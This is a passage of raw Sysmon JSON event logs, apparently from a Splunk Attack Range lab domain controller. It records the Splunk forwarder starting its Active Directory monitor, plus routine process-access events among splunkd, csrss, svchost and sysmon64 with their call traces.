MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.399","ProcessGuid":"{41C8662E-2219-5F25-0000-001033E90A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6789,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2219-5F25-0000-001033E90A00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2219-5F25-0000-001033E90A00}","TargetProcessId":"1328","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6790,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2219-5F25-0000-001033E90A00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2219-5F25-0000-001033E90A00}","TargetProcessId":"1328","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6791,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6792,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6793,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6794,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6795,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6796,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 